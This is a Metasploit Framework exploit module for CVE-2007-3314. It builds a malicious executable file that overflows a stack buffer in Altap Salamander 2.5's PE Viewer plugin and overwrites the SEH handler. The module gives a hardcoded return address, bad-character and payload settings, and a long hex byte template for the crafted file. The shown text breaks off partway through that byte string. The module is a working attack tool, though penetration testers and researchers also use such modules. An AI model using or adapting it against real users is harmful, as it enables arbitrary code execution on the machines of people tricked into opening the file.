##
# $Id: altap_salamander_pdb.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Altap Salamander 2.5 PE Viewer Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Altap Salamander <= v2.5.
					By creating a malicious file and convincing a user to view the file with
					the Portable Executable Viewer plugin within a vulnerable version of
					Salamander, the PDB file string is copied onto the stack and the
					SEH can be overwritten.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'patrick' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2007-3314' ],
					[ 'BID', '24557' ],
					[ 'OSVDB', '37579' ],
					[ 'URL', 'http://vuln.sg/salamander25-en.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},					
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0d\x0a=:\\/%$^&*",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Universal Salamander 2.5', { 'Ret' => 0x23920b59 } ], # pop ebx; pop eax; ret salrtl.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 19 2007',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ false, 'The file name.',  'msf-salamander-pdb.exe']),
					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
				], self.class)

	end

	def exploit

		seh = generate_seh_payload(target.ret)

		sploit = "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x00\x00\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00\x76\xEE\xF8\xA2\x32\x8F\x96\xF1\x32\x8F\x96\xF1\x32\x8F\x96\xF1\x3B\xF7\x05\xF1\x31\x8F\x96\xF1\x3B\xF7\x15\xF1\x3E\x8F\x96\xF1\x15\x49\xED\xF1\x30\x8F\x96\xF1\x32\x8F\x97\xF1\x1F\x8F\x96\xF1\x3B\xF7\x12\xF1\x3B\x8F\x96\xF1\x3B\xF7\x02\xF1\x33\x8F\x96\xF1\x3B\xF7\x07\xF1\x33\x8F\x96\xF1\x52\x69\x63\x68\x32\x8F\x96\xF1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x07\x00\xD3\xD9\x99\x4A\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x02\x21\x0B\x01\x09\x00\x00\x34\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\xC8\x10\x01\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x10\x00\x10\x00\x00\x00\x02\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x01\x00\x00\x04\x00\x00\x00\x00\x00\x00\x02\x00\x40\x01\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00\x3C\x00\x00\x00\x00\x90\x01\x00\x09\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA0\x01\x00\x9C\x02\x00\x00\x20\x55\x01\x00\x1C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x81\x01\x00\x2C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x74\x65\x78\x74\x62\x73\x73\x00\x00\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA0\x00\x00\xE0\x2E\x74\x65\x78\x74\x00\x00\x00\x4E\x32\x00\x00\x00\x10\x01\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\xC2\x18\x00\x00\x00\x50\x01\x00\x00\x1A\x00\x00\x00\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x74\x05\x00\x00\x00\x70\x01\x00\x00\x02\x00\x00\x00\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x2E\x69\x64\x61\x74\x61\x00\x00\x3B\x07\x00\x00\x00\x80\x01\x00\x00\x08\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x2E\x72\x73\x72\x63\x00\x00\x00\x09\x0C\x00\x00\x00\x90\x01\x00\x00\x0E\x00\x00\x00\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x72\x65\x6C\x6F\x63\x00\x00\x1A\x04\x00\x00\x00\xA0\x01\x00\x00\x06\x00\x00\x00\x6A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCC\xCC\xCC\xCC\xCC\xE9\x5A\x22\x00\x00\xE9\xA1\x0A\x00\x00\xE9\x72\x0D\x00\x00\xE9\xD7\x1A\x00\x00\xE9\x3A\x22\x00\x00\xE9\x2D\x0D\x00\x00\xE9\x42\x22\x00\x00\xE9\xC3\x02\x00\x00\xE9\x3E\x0B\x00\x00\xE9\x69\x0A\x00\x00\xE9\xF2\x21\x00\x00\xE9\x59\x22\x00\x00\xE9\xFA\x0F\x00\x00\xE9\x73\x22\x00\x00\xE9\x74\x1A\x00\x00\xE9\x4B\x22\x00\x00\xE9\x96\x0C\x00\x00\xE9\x11\x22\x00\x00\xE9\x6C\x0A\x00\x00\xE9\xF7\x10\x00\x00\xE9\x68\x1A\x00\x00\xE9\x09\x22\x00\x00\xE9\x58\x20\x00\x00\xE9\xC9\x21\x00\x00\xE9\xA4\x0F\x00\x00\xE9\x2B\x22\x00\x00\xE9\xF4\x0C\x00\x00\xE9\x0F\x19\x00\x00\xE9\xEA\x02\x00\x00\xE9\x95\x0D\x00\x00\xE9\xA0\x02\x00\x00\xE9\xAB\x15\x00\x00\xE9\xE8\x0C\x00\x00\xE9\xD3\x21\x00\x00\xE9\xAA\x21\x00\x00\xE9\x69\x21\x00\x00\xE9\xF2\x0C\x00\x00\xE9\x71\x21\x00\x00\xE9\x8A\x10\x00\x00\xE9\x53\x07\x00\x00\xE9\xC2\x21\x00\x00\xE9\x59\x0A\x00\x00\xE9\xC4\x0A\x00\x00\xE9\x2F\x07\x00\x00\xE9\xA2\x21\x00\x00\xE9\x15\x0A\x00\x00\xE9\xBC\x21\x00\x00\xE9\x45\x21\x00\x00\xE9\xD0\x19\x00\x00\xE9\x4D\x21\x00\x00\xE9\x88\x0C\x00\x00\xE9\x17\x0C\x00\x00\xE9\x44\x21\x00\x00\xE9\x85\x0C\x00\x00\xE9\xF8\x19\x00\x00\xE9\x59\x0A\x00\x00\xE9\x1E\x21\x00\x00\xE9\x59\x0A\x00\x00\xE9\xA4\x0D\x00\x00\xE9\x5D\x21\x00\x00\xE9\xFC\x0E\x00\x00\xE9\x63\x0C\x00\x00\xE9\xE8\x20\x00\x00\xE9\x73\x21\x00\x00\xE9\x92\x19\x00\x00\xE9\x27\x21\x00\x00\xE9\x2C\x11\x00\x00\xE9\x37\x16\x00\x00\xE9\xE2\x02\x00\x00\xE9\x3D\x10\x00\x00\xE9\x68\x19\x00\x00\xE9\x39\x21\x00\x00\xE9\xBA\x0E\x00\x00\xE9\xE9\x09\x00\x00\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x55\x8B\xEC\x81\xEC\xC4\x00\x00\x00\x53\x56\x57\x8D\xBD\x3C\xFF\xFF\xFF\xB9\x31\x00\x00\x00\xB8\xCC\xCC\xCC\xCC\xF3\xAB\x8B\x45\x0C\x89\x85\x3C\xFF\xFF\xFF\xB8\x01\x00\x00\x00\x5F\x5E\x5B\x8B\xE5\x5D\xC2\x0C\x00\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x80\x3D\x38\x71\x01\x10\x00\x75\x1F\x6A\x00\x6A\x01\x6A\x00\x6A\x00\x6A\x00\xC6\x05\x38\x71\x01\x10\x01\xE8\xB9\xFD\xFF\xFF\x50\xE8\x6D\xFD\xFF\xFF\x83\xC4\x18\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x6A\x01\x6A\x01\x6A\x00\x6A\x00\x6A\x00\xE8\x89\xFD\xFF\xFF\x83\xC4\x14\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x51\x68\xAA\x00\x00\x00\x68\x40\x55\x01\x10\x6A\x02\x68\x80\x00\x00\x00\xFF\x15\x50\x82\x01\x10\x83\xC4\x10\x89\x45\xFC\x8B\x45\xFC\x50\xFF\x15\x54\x82\x01\x10\x83\xC4\x04\xA3\x64\x75\x01\x10\x8B\x0D\x64\x75\x01\x10\x89\x0D\x54\x75\x01\x10\x83\x7D\xFC\x00\x75\x07\xB8\x01\x00\x00\x00\xEB\x2A\x8B\x55\xFC\xC7\x02\x00\x00\x00\x00\xE8\x08\xFD\xFF\xFF\x68\x1E\x10\x01\x10\xE8\x4F\xFC\xFF\xFF\x83\xC4\x04\x68\x22\x11\x01\x10\xE8\x42\xFC\xFF\xFF\x83\xC4\x04\x33\xC0\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\xEC\x34\x83\x7D\x0C\x00\x75\x1F\x83\x3D\x3C\x71\x01\x10\x00\x7E\x0F\xA1\x3C\x71\x01\x10\x83\xE8\x01\xA3\x3C\x71\x01\x10\xEB\x07\x33\xC0\xE9\xD9\x02\x00\x00\x8B\x0D\x30\x82\x01\x10\x8B\x11\x89\x15\x34\x75\x01\x10\x83\x7D\x0C\x01\x0F\x85\x05\x01\x00\x00\xC7\x45\xF4\x00\x00\x00\x00\xE8\x4B\xFC\xFF\xFF\x8B\x40\x04\x89\x45\xF8\xC7\x45\xFC\x00\x00\x00\x00\x6A\x00\x8B\x4D\xF8\x51\x68\x50\x75\x01\x10\xFF\x15\xC0\x81\x01\x10\x89\x45\xF4\x83\x7D\xF4\x00\x74\x1E\x8B\x55\xF4\x3B\x55\xF8\x75\x09\xC7\x45\xFC\x01\x00\x00\x00\xEB\x0D\x68\xE8\x03\x00\x00\xFF\x15\xBC\x81\x01\x10\xEB\xC8\x83\x3D\x40\x75\x01\x10\x00\x74\x0C\x6A\x1F\xE8\x4B\xFC\xFF\xFF\x83\xC4\x04\xEB\x43\xC7\x05\x40\x75\x01\x10\x01\x00\x00\x00\x68\x10\x54\x01\x10\x68\x08\x52\x01\x10\xE8\x69\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x07\x33\xC0\xE9\x34\x02\x00\x00\x68\x04\x51\x01\x10\x68\x00\x50\x01\x10\xE8\x5C\xFB\xFF\xFF\x83\xC4\x08\xC7\x05\x40\x75\x01\x10\x02\x00\x00\x00\x83\x7D\xFC\x00\x75\x0D\x6A\x00\x68\x50\x75\x01\x10\xFF\x15\xB8\x81\x01\x10\x83\x3D\x68\x75\x01\x10\x00\x74\x21\x68\x68\x75\x01\x10\xE8\xD3\xFB\xFF\xFF\x83\xC4\x04\x85\xC0\x74\x10\x8B\x45\x10\x50\x6A\x02\x8B\x4D\x08\x51\xFF\x15\x68\x75\x01\x10\x6A\x01\xFF\x15\x40\x82\x01\x10\x83\xC4\x04\x8B\x15\x3C\x71\x01\x10\x83\xC2\x01\x89\x15\x3C\x71\x01\x10\xE9\xB7\x01\x00\x00\x83\x7D\x0C\x00\x0F\x85\xAD\x01\x00\x00\xC7\x45\xE8\x00\x00\x00\x00\xE8\x3C\xFB\xFF\xFF\x8B\x40\x04\x89\x45\xEC\xC7\x45\xF0\x00\x00\x00\x00\x6A\x00\x8B\x4D\xEC\x51\x68\x50\x75\x01\x10\xFF\x15\xC0\x81\x01\x10\x89\x45\xE8\x83\x7D\xE8\x00\x74\x1E\x8B\x55\xE8\x3B\x55\xEC\x75\x09\xC7\x45\xF0\x01\x00\x00\x00\xEB\x0D\x68\xE8\x03\x00\x00\xFF\x15\xBC\x81\x01\x10\xEB\xC8\x83\x3D\x40\x75\x01\x10\x02\x74\x0F\x6A\x1F\xE8\x3C\xFB\xFF\xFF\x83\xC4\x04\xE9\x44\x01\x00\x00\xA1\x64\x75\x01\x10\x50\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xE4\x83\x7D\xE4\x00\x0F\x84\x0B\x01\x00\x00\x8B\x0D\x54\x75\x01\x10\x51\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xD8\xC7\x45\xDC\x00\x00\x00\x00\x8B\x55\xE4\x89\x55\xD4\x8B\x45\xD8\x89\x45\xE0\xB9\x01\x00\x00\x00\x85\xC9\x0F\x84\xB2\x00\x00\x00\xC7\x45\xD0\x00\x00\x00\x00\xC7\x45\xCC\x00\x00\x00\x00\x8B\x55\xD8\x83\xEA\x04\x89\x55\xD8\x8B\x45\xD8\x3B\x45\xE4\x72\x17\x8B\x4D\xD8\x83\x39\x00\x74\x0D\xFF\x15\x48\x82\x01\x10\x8B\x55\xD8\x39\x02\x75\x02\xEB\xD8\x8B\x45\xD8\x3B\x45\xE4\x73\x02\xEB\x72\x8B\x4D\xD8\x8B\x11\x52\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xDC\xFF\x15\x48\x82\x01\x10\x8B\x4D\xD8\x89\x01\xFF\x55\xDC\x8B\x15\x64\x75\x01\x10\x52\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xD0\xA1\x54\x75\x01\x10\x50\xFF\x15\x44\x82\x01\x10\x83\xC4\x04\x89\x45\xCC\x8B\x4D\xD4\x3B\x4D\xD0\x75\x08\x8B\x55\xE0\x3B\x55\xCC\x74\x18\x8B\x45\xD0\x89\x45\xD4\x8B\x4D\xD4\x89\x4D\xE4\x8B\x55\xCC\x89\x55\xE0\x8B\x45\xE0\x89\x45\xD8\xE9\x41\xFF\xFF\xFF\x6A\x02\x8B\x4D\xE4\x51\xFF\x15\x4C\x82\x01\x10\x83\xC4\x08\xFF\x15\x48\x82\x01\x10\xA3\x54\x75\x01\x10\x8B\x15\x54\x75\x01\x10\x89\x15\x64\x75\x01\x10\xC7\x05\x40\x75\x01\x10\x00\x00\x00\x00\x83\x7D\xF0\x00\x75\x0D\x6A\x00\x68\x50\x75\x01\x10\xFF\x15\xB8\x81\x01\x10\xB8\x01\x00\x00\x00\x8B\xE5\x5D\xC2\x0C\x00\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x64\xA1\x18\x00\x00\x00\x5D\xC3\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x83\x7D\x0C\x01\x75\x05\xE8\x11\xF8\xFF\xFF\x8B\x45\x10\x50\x8B\x4D\x0C\x51\x8B\x55\x08\x52\xE8\x1F\x00\x00\x00\x83\xC4\x0C\x5D\xC2\x0C\x00\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x6A\xFE\x68\x00\x67\x01\x10\x68\x64\x10\x01\x10\x64\xA1\x00\x00\x00\x00\x50\x83\xC4\xF0\x53\x56\x57\xA1\x0C\x70\x01\x10\x31\x45\xF8\x33\xC5\x50\x8D\x45\xF0\x64\xA3\x00\x00\x00\x00\x89\x65\xE8\xC7\x45\xE4\x01\x00\x00\x00\xC7\x45\xFC\x00\x00\x00\x00\x8B\x45\x0C\xA3\x00\x70\x01\x10\xC7\x45\xFC\x01\x00\x00\x00\x83\x7D\x0C\x00\x75\x15\x83\x3D\x3C\x71\x01\x10\x00\x75\x0C\xC7\x45\xE4\x00\x00\x00\x00\xE9\xF2\x00\x00\x00\x83\x7D\x0C\x01\x74\x06\x83\x7D\x0C\x02\x75\x43\x83\x3D\x3C\x55\x01\x10\x00\x74\x15\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\xFF\x15\x3C\x55\x01\x10\x89\x45\xE4\x83\x7D\xE4\x00\x74\x14\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\xE8\x4B\xF8\xFF\xFF\x89\x45\xE4\x83\x7D\xE4\x00\x75\x05\xE9\xA3\x00\x00\x00\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\xE8\xFB\xF6\xFF\xFF\x89\x45\xE4\x83\x7D\x0C\x01\x75\x3D\x83\x7D\xE4\x00\x75\x37\x8B\x4D\x10\x51\x6A\x00\x8B\x55\x08\x52\xE8\xDD\xF6\xFF\xFF\x8B\x45\x10\x50\x6A\x00\x8B\x4D\x08\x51\xE8\xFF\xF7\xFF\xFF\x83\x3D\x3C\x55\x01\x10\x00\x74\x10\x8B\x55\x10\x52\x6A\x00\x8B\x45\x08\x50\xFF\x15\x3C\x55\x01\x10\x83\x7D\x0C\x00\x74\x06\x83\x7D\x0C\x03\x75\x40\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\xE8\xC9\xF7\xFF\xFF\x85\xC0\x75\x07\xC7\x45\xE4\x00\x00\x00\x00\x83\x7D\xE4\x00\x74\x1E\x83\x3D\x3C\x55\x01\x10\x00\x74\x15\x8B\x4D\x10\x51\x8B\x55\x0C\x52\x8B\x45\x08\x50\xFF\x15\x3C\x55\x01\x10\x89\x45\xE4\xC7\x45\xFC\x00\x00\x00\x00\xEB\x2C\x8B\x4D\xEC\x8B\x11\x8B\x02\x89\x45\xE0\x8B\x4D\xEC\x51\x8B\x55\xE0\x52\xE8\xE4\xF6\xFF\xFF\x83\xC4\x08\xC3\x8B\x65\xE8\xC7\x45\xE4\x00\x00\x00\x00\xC7\x45\xFC\x00\x00\x00\x00\xC7\x45\xFC\xFE\xFF\xFF\xFF\xE8\x02\x00\x00\x00\xEB\x0B\xC7\x05\x00\x70\x01\x10\xFF\xFF\xFF\xFF\xC3\x8B\x45\xE4\x8B\x4D\xF0\x64\x89\x0D\x00\x00\x00\x00\x59\x5F\x5E\x5B\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xB8\x05\x00\x00\x00\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x45\x08\x83\xF8\x04\x77\x09\x8B\x04\x85\x48\x56\x01\x10\x5D\xC3\x33\xC0\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x4D\x08\x83\xF9\x04\x77\x13\x8B\x55\x0C\x8B\x04\x8D\x14\x70\x01\x10\x89\x14\x8D\x14\x70\x01\x10\x5D\xC3\x83\xC8\xFF\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x4D\x08\xA1\x40\x71\x01\x10\x89\x0D\x40\x71\x01\x10\xC7\x05\x44\x71\x01\x10\x00\x00\x00\x00\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x8B\x4D\x08\xA1\x44\x71\x01\x10\x89\x0D\x44\x71\x01\x10\xC7\x05\x40\x71\x01\x10\x00\x00\x00\x00\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xA1\x40\x71\x01\x10\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xA1\x44\x71\x01\x10\xC3\xFF\x25\x58\x82\x01\x10\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x68\x50\x71\x01\x10\xE8\xBC\xF4\xFF\xFF\x83\xC4\x04\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x6A\xFE\x68\x30\x67\x01\x10\x68\x64\x10\x01\x10\x64\xA1\x00\x00\x00\x00\x50\x83\xC4\xEC\x53\x56\x57\xA1\x0C\x70\x01\x10\x31\x45\xF8\x33\xC5\x50\x8D\x45\xF0\x64\xA3\x00\x00\x00\x00\xA1\x64\x75\x01\x10\x50\xFF\x15\x44\x82\x01\x10\x83\